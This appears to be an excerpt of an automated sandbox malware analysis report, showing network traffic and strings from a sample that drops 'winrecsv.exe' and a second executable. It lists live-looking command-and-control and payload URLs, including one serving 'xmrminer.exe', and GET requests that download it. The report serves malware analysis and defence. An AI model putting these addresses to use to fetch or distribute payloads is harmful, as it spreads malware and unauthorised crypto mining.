6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:55 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:56 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:58 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Aug 2022 16:32:59 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Aug 2022 16:33:03 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Aug 2022 16:33:04 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Aug 2022 16:33:05 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Aug 2022 16:33:06 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Aug 2022 16:33:07 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Aug 2022 16:33:11 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Aug 2022 16:33:12 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.66
Source: unknown TCP traffic detected without corresponding DNS query: 176.194.22.84
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/
Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/B1-4D5E-B0E7-362EE23EA443
Source: winrecsv.exe, winrecsv.exe, 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp, winrecsv.exe, 00000005.00000000.377043204.0000000000413000.00000008.00000001.01000000.00000004.sdmp, Id4zlrsrZ4.exe, winrecsv.exe.0.dr String found in binary or memory: http://185.215.113.66/twizt/
Source: winrecsv.exe, 00000005.00000003.389375637.0000000003171000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.391449369.0000000003176000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.390695269.0000000003176000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.392545417.000000000317F000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.390949780.0000000003152000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.391425043.000000000317A000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389739491.000000000317E000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.391456137.000000000317B000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.391892935.000000000317E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/1
Source: winrecsv.exe, 00000005.00000003.389375637.0000000003171000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389646709.00000000031A9000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389630272.0000000003199000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389653445.00000000031AC000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389580007.0000000003192000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/15C5FCA7
Source: winrecsv.exe, 00000005.00000003.389375637.0000000003171000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389739491.000000000317E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/19
Source: winrecsv.exe, 00000005.00000003.389365979.0000000003153000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/1NNC:
Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/2
Source: winrecsv.exe, 00000005.00000002.607560778.000000000244A000.00000004.00000010.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/3
Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/3E8
Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/3Strong
Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/3l
Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/3l=8
Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/3lZ9
Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/4
Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/4lH9
Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/5
Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/5#8u
Source: winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/6
Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/6k8
Source: winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/twizt/6lS9
Source: Id4zlrsrZ4.exe, winrecsv.exe.0.dr String found in binary or memory: http://185.215.113.66/twizt/984658winrecsv.exeWindows
Source: 509517324.exe, 00000007.00000002.420203300.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmp, 509517324.exe, 00000007.00000000.399548533.00000000010D2000.00000002.00000001.01000000.00000006.sdmp, 509517324.exe.5.dr String found in binary or memory: http://185.215.113.84/xmrminer.exe
Source: 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.84/xmrminer.exe(
Source: 509517324.exe, 00000007.00000002.420296695.000000000123D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.84/xmrminer.exeBLk
Source: 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.84/xmrminer.exer
Source: 509517324.exe, 00000007.00000002.420296695.000000000123D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.84/xmrminer.exero/
Source: 509517324.exe, 00000007.00000002.420203300.00000000011DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.84/xmrminer.exes
Source: 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.84/xmrminer.exe~
Source: winrecsv.exe, winrecsv.exe, 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp, winrecsv.exe, 00000005.00000000.377043204.0000000000413000.00000008.00000001.01000000.00000004.sdmp, Id4zlrsrZ4.exe, winrecsv.exe.0.dr String found in binary or memory: http://2462462645.fr/
Source: Id4zlrsrZ4.exe, winrecsv.exe.0.dr String found in binary or memory: http://2462462645.fr/5797957298589274527842dgd828d8g8fg8g8gfeu8gf8g2gf8g2fgaefafugaugfgauegfaefyaieg
Source: winrecsv.exe.0.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: winrecsv.exe.0.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: 509517324.exe, 00000007.00000002.420296695.000000000123D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040C840 recvfrom,Sleep,StrCmpNIA,StrStrIA,StrChrA,0_2_0040C840
Source: global traffic | HTTP traffic detected: GET /twizt/1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /xmrminer.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | Host: 185.215.113.84
Source: global traffic | HTTP traffic detected: GET /twizt/2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: 185.215.113.66
